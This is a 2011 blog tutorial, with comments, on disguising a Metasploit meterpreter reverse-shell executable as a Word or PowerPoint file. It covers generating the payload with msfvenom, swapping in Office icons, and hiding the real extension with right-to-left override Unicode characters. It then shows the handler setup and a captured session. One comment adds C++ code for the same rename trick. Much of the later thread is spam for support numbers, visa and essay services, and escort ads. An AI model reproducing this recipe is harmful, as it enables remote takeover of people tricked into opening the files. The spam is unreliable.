Although the attack is not new, I could not find much information about good ways to create such files - so here is how I created a meterpreter payload and made it look like a normal file on Windows Vista/7.
During the process, I accessed the files both from Linux (metasploit, ruby) and Windows (Resource Hacker) using a Virtual Box machine with a shared folder. It should be possible to do everything on Windows only, but I did not test it.
[update 2011-11-04]
I just tested the examples with Windows 7 + Ruby 1.9.2. As a reader reported in the comments, the original examples do not work. Ruby 1.9.2 has improved unicode support, so we can use the \uXXXX codes directly - I added an alternative version of the commands.
[/update]
First, create a payload:
./msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 1 -f exe LHOST=192.168.1.1 LPORT=4444 >/tmp/demo.exe
To make the file look like our target format, we need to give the executable file an icon. Copy demo.exe to demo_doc.exe and demo_ppt.exe to create a Word and a Powerpoint template.
Now we need to find the correct icons for these filetypes. Start Resource Hacker (http://www.angusj.com/resourcehacker/) and open the Word executable holding the icons ("c:\program files\microsoft office\office14\wordicon.exe" on my system). Find a suitable icon group and note the corresponding values (resource name = 201 and language = 1033 in my case). Resource Hacker showed some error messages on my system, but it worked nonetheless.
Now open your payload (demo_doc.exe) file in Resource Hacker. Click "Action -> Add a new Resource". Open the file holding the icon (wordicon.exe in my case), set resource type to "ICON" and enter the collected values.
If you use an executable that already has an icon (e.g. when executing msfvenom with calc.exe as a template), use "Action -> Replace Icon".
Click "Add Resource" and save the file.
Repeat the process for the Powerpoint file. I used the file powerpnt.exe, resource name = 1301, language = 1033.
This is what you should see in Windows Explorer:
Theoretically, you could first rename the files before editing the icon resources. However, in my tests Resource hacker did not work correctly with the unicode filenames, so I recommend doing it in the described order.
The most used character for these tricks is "right-to-left override" (RTLO), in unicode: U+202E.
First, we need to convert this into an UTF-8 representation. You can do this by hand, like described here: http://home.tiscali.nl/t876506/utf8tbl.html, or you can just look it up: http://www.fileformat.info/info/unicode/char/202e/index.htm
So, U+202E converts to 0xE280AE.
With a simple RTLO, we can reverse the right side of the filename, so "cod.exe" looks like "exe.doc". We are quite limited here, as the name of the file needs to end on exe.
One good example I found was a file displayed as "SexyAlexe.ppt". The real name of this file is "SexyAl\xe2\x80\xaetpp.exe".
I used ruby to execute the rename commands, as the special characters sometimes cause problems if you try to execute them in a normal shell.
# Original version, tested on Linux with Ruby 1.8.7
ruby -e 'File.rename("demo_ppt.exe", "SexyAl\xe2\x80\xaetpp.exe")'
# Alternative version, tested on Windows 7 with Ruby 1.9.2
ruby -e 'File.rename("demo_ppt.exe", "SexyAl\u202Etpp.exe")'
In Windows Explorer:
For more advanced file names, we need a second unicode character: U+202D = 0xE280AD, this one is called left-to-right override (LTRO).
Using this, the real file extension of the file can be placed anywhere in the displayed filename. We now also use .scr as extension to have more options.
# [RTLO]cod.yrammus_evituc[LTRO]2011.exe
# Original version, tested on Linux with Ruby 1.8.7
ruby -e 'File.rename("demo_doc.exe", "\xe2\x80\xaecod.yrammus_evituc\xe2\x80\xad2011.exe")'
# Alternative version, tested on Windows 7 with Ruby 1.9.2
ruby -e 'File.rename("demo_doc.exe", "\u202Ecod.yrammus_evituc\u202D2011.exe")'
# [RTLO]tpp.stohsnee[LTRO]funny.scr
# Original version, tested on Linux with Ruby 1.8.7
ruby -e 'File.rename("demo_ppt.exe", "\xe2\x80\xaetpp.stohsnee\xe2\x80\xadfunny.scr")'
# Alternative version, tested on Windows 7 with Ruby 1.9.2
ruby -e 'File.rename("demo_ppt.exe", "\u202Etpp.stohsnee\u202Dfunny.scr")'
The filename is created in two parts, first writing from right to left and then from left to right, prepending the characters left of all those already written.
Result:
Open a metasploit console on the attacking machine:
./msfconsole msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.1 msf exploit(handler) > exploitNow, open one of the created files on the target machine and you should get a meterpreter shell:
[*] Started reverse handler on 192.168.1.1:4444 [*] Starting the payload handler... [*] Sending stage (752128 bytes) to 192.168.1.100 [*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.100:54354) at Sun Oct 23 19:42:30 +0200 2011Of course, no document will be opened and some users might get suspicious. An advanced version of this attack would use an executable file that extracts an embedded document, opens it and then executes the reverse shell.
Posts
At first I thought this is going to be easy in VC++ 2010 "rename() or CopyFile()".
ReplyDeletebut...It isn't, dealing with UNICODE filenames in C turned out to be not straight forward.
Will really appreciate some help if someone managed to do this in C(++).
Big data is a term that describes the large volume of data – both structured and unstructured – that inundates a business on a day-to-day basis. big data projects for students But it’s not the amount of data that’s important.Project Centres in Chennai
DeletePython Training in Chennai Python Training in Chennai The new Angular TRaining will lay the foundation you need to specialise in Single Page Application developer. Angular Training Project Centers in Chennai
Great job.
ReplyDeleteBut sending "funny.screenshot.doc" with a Powerpoint icon is not that discrete :)
Anyways we both know that´s just a detail, great post, man.
I figured out how to do it in C++, using _wrename() instead of rename()
ReplyDeletecompile the following code and place test.exe in the same directory, then execute
//CODE
#include
int main(int argc, char* argv[])
{
int result;
const wchar_t* wide_oldname = L"test.exe";
wchar_t newname[] = L"Presentation_Al"
L"\u202E"
L"tpp.exe"; //RTOL Unicode, keep as is
result = _wrename( wide_oldname , newname );
if ( result == 0 )
puts ( "File successfully renamed" );
else
perror( "Error renaming file" );
return 0;
}
Total Commander shows the file name properly - as EXE file
Delete[RLO] Unicode character REALLY confuses windows :) "Try to read the error message"
ReplyDeletehttp://img560.imageshack.us/img560/5337/capture0022710201109555.jpg
@Julio:
ReplyDeletethanks for the hint - I just corrected that.
@Sherif:
This might be useful to create a loader program that extracts & opens a real office file and then executes a payload, thanks for sharing your code and the nice error message :)
I tried this on Windows 7 Professional x64 with Ruby ver 1.9.2. I tried to reproduce the example i.e. tried renaming a file from "demo_ppt.exe" to "SexyAlexe.ppt". But unexpectedly I get:
ReplyDelete"SexyAlΓÇxaeppt.exe"
when I execute:
ruby -e 'File.rename("demo_ppt.exe", "SexyAl\xe2\x80\xaetpp.exe")'
Why doesn't it work? Am I missing something?
The ruby being used in the blog post is under linux.
ReplyDeletethe windows version of ruby will output "THREE" charachters xe2 & x80 & xae, not the "xe280ae" single charachter.
this is maybe because of the cmd.exe?
under windows, just use the charmap.exe!!
Thanks. It seems to be fine now. :)
ReplyDeleteStrangely,
ReplyDelete"SexyAl\xe2\x80\xaetpp.exe"
produces "SexyAlexe.ppt" where as
"\xe2\x80\xaecod.yrammus_evituc\xe2\x80\xad2011.exe"
produces
_summary.doc2011executive
on Backtrack 5 R1 (1.9.2). Same filename on Windows 7 x64.
Thoughts?
I also had the described problem when trying this on Windows 7 + Ruby 1.9.2.
ReplyDeleteRuby 1.9.2 has improved unicode support and uses different libraries on Windows than version 1.8.x.
It is possible to use the \uXXXX codes directly without converting them UTF-8 - I updated the examples in the post accordingly.
Software engineering can be defined as, "the application of a systematic, disciplined, quantifiable approach to the development, operation, and maintenance of software." Another definition states, "an engineering discipline that is concerned with all aspects of software production."cheap Revit Architecture 2015
ReplyDeleteDo you have difficulty in writing an finance assignment? Here is the solution! Opt for our finance assignment help and get a high-quality academic assignment written within the set deadline. As an assignment help provider, we know the importance of finance assignment in students' life. fullassignment has a team with expertise and experience in finance assignment help. We provide the best online assignment help to students. For more info please visit our website: https://fullassignment.com/
ReplyDeletehttps://fullassignment.com/services/finance-accounting-assignment-help
or reach out us on whatsapp - (+1) 669-271-4848
Do you have difficulty in writing an database assignment? Here is the solution! Opt for our database assignment help and get a high-quality academic assignment written within the set deadline. As an assignment help provider, we know the importance of database assignment in students' life. fullassignment has a team with expertise and experience in database assignment help. We provide the best online assignment help to students. For more info please visit our website: https://fullassignment.com/
ReplyDeletehttps://fullassignment.com/services/finance-accounting-assignment-help
or reach out us on whatsapp - (+1) 669-271-4848
Well done! Great article...
ReplyDeleteThe type initializer for threw an exception in Sage
How to find Sage 50 2019 ini file location
How long does it take to learn QuickBooks
Sage 50 2019 activating problem
Fix unable to email from sage 50 accounting peachtree
Your activation key for sage 50 has expired
Invaild serial number entered during sage 50 installation
Sage 50 Error the user you entered is already logged
Sage 50 accounting has stopped working on windows 10
Resolve component required for pdf print from QuickBooks
Nice & Informative Blog !
ReplyDeleteFinding adequate technical services for QuickBooks in this competitive world is quite challenging. Our team at QuickBooks Customer Support Number 1-877-948-5867 is always available to offer you the best technical help for QuickBooks.
I am reading a blog on this website for the first time and I would like to tell you that the quality of the content is up to the mark. It is very well written. Thank you so much for writing this blog and I will surely read all the blogs from now on. I also write blog and my latest blog is QuickBooks Error 6069
ReplyDeleteWow, so beautiful and wonderful post! Thanks for giving an opportunity to read a fantastic and imaginary blog. It gives me lots of pleasure and interest. Thanks for sharing. If you need any technical support related QuickBooks, click here, QuickBooks Customer Service Number for immediate solution.
ReplyDeleteThis field is very much profitable and many professionals join it because they want to secure their future. If you are jobless, you should join this field and enjoy earning money. Dissertation writing services.
ReplyDeleteHey! Lovely blog. Your blog contains all the details and information related to the topic. In case you are a QuickBooks user, here is good news for you. You may encounter any error like QuickBooks Error, visit at QuickBooks Customer Service Number for quick help.
ReplyDeleteHey! Mind-blowing blog. Keep writing such beautiful blogs. In case you are struggling with issues on QuickBooks software, dial QuickBooks Support Number. The team, on the other end, will assist you with the best technical services.
ReplyDeleteHey! What a wonderful blog. I loved your blog. QuickBooks is the best accounting software, however, it has lots of bugs like QuickBooks Error. To fix such issues, you can contact experts via QuickBooks Customer Service Phone Number
ReplyDeleteHey! Well-written blog. It is the best thing that I have read on the internet today. Moreover, if you are looking for the solution of QuickBooks Software, visit at QuickBooks Customer Service Number to get your issues resolved quickly.
ReplyDeleteWow, this is delightful reading.I'm glad I found it and got to read it. Great job on this content. I felt very good. Thanks for the great and unique info.Turkish Visit Visa, All citizens have to complete visa transit Turkey, go through the application process and pay the fee.
ReplyDeleteWhen you talk about one of the biggest and widely used bookkeeping programming, it has to be QuickBooks. It offers numerous advanced accounting features that handle various business activities of the organizations and make it effortless. But sometimes, it comes across various technical issues such as QuickBooks error 12152 due to which the software cannot connect with the servers. Moreover, below we have listed all such methods available that can help you resolve it at the earliest. If you need any assistance, we suggest you give us a call on our helpline number 855-856-0053.
ReplyDeleteQuickbooks error 12152
Fantastic work.. I appreciate it. The travelers around the world who wish to travel to Azerbaijan need to apply for Azerbaijan evisa through e visa application. Get your visa with super fast processing with 24/7 assistance.
ReplyDeleteI will come everyday and read. It's really great to have a place like this. It's great to have a place like this. Eligible citizens can apply for a kenya business visa through a simple online application form to obtain an approved e-Visa electronically linked to their passport.
ReplyDeleteThanks for sharing such useful information with us. I hope you will share some more info about your blog. Please keep sharing. We will also provide QuickBooks Customer Service Number (855)587-4968 or instant help.
ReplyDeleteI want to always read your blogs. I love them Are you also searching for nursing research paper help? we are the best solution for you. We are best known for delivering Nursing research paper writing services to students without having to break the bank
ReplyDeleteI want to always read your blogs. I love them Are you also searching for Nursing thesis writing services? we are the best solution for you. We are best known for delivering Nursing thesis writing services to students without having to break the bank
ReplyDeleteI want to always read your blogs. I love them Are you also searching for Nursing case study writing services? we are the best solution for you. We are best known for delivering Nursing case study writing services to students without having to break the bank
ReplyDeleteLots of great information and inspiration both I need, thanks for putting such useful information here. You can apply for an online emergency visa to India via India evisa website.
ReplyDeleteSelecting a potential research area based on base or concept paper selection for your PhD Dissertation is challenging PhD Assistance Research Lab helps in narrowing down your research topic based on industry challenge and future research gaps identified from the literature review UK
ReplyDeleteThanks for sharing excellent information. Keep sharing such useful information.. Keep sharing such useful information. India visa from usa, You can easily apply for indian visa from usa via Indian Visa website.
ReplyDeleteGreat work! It is the best thing that I have read on the internet today. Moreover, If you encounter any error while working on QuickBooks software , do contact this QuickBooks Customer Support (855)552-2543 number for quick assistance.
ReplyDeleteNice Blog, I have get enough information from your blog and I appreciate your way of writing.
ReplyDeleteThanks for everything Passfab iPhone unlocked registration code
Hey! Nice Blog, I have been using QuickBooks for a long time. One day, I encountered QuickBooks Enterprise Support (855)756-1077 in my software, then I called QuickBooks Support Phone Number (855)885-8282. They resolved my error in the least possible time.
ReplyDeleteThanks for your efforts. This is really an inspiring and helpful article. There is no need to meet the Ukraine embassy specially to get a valid Ukraine visa. You can get a Ukraine-visa in 4 working days.
ReplyDeleteCoinbase support number | official site
ReplyDeletecoinbase support number | coinbase support number | coinbase support number | coinbase support number | coinbase support number |
Wow.. Very informative article thanks for sharing please keep it up.. In the case of emergency e visa India fees for US citizens it may be applicable some extra charges.
ReplyDeleteThanks for sharing such useful information with us. I hope you will share some more info about your blog. Please keep sharing. We will also provide QuickBooks Customer Service Number +1 888-210-4052 or instant help.
ReplyDeleteThanks for sharing good blog. Yoga have the power to change your mentality that how to think ,how to control your mind and how to use it. Yoga, yogainfo , yoga history, you reach us at
ReplyDeleteGood afternoon sir, Many people ask, How to apply Indian e visa? You can read about applying for an Indian e visa eta through our website.
ReplyDeleteHey what a great post and believe me I have been looking for this type of post since last one week and hardly came across this. Thank you very much ... Many people ask for visa requirements for Turkey, You can read all Turkey entry requirements via our Turkey visa website.
ReplyDeleteNice article I was really impressed seeing this article, it was very interesting and it is very useful for me we provide best internship training in chennai
ReplyDelete공주콜걸
ReplyDelete아산콜걸
포천콜걸
포천콜걸
울진콜걸
당진콜걸
서산콜걸
여주콜걸
울릉도콜걸
여주콜걸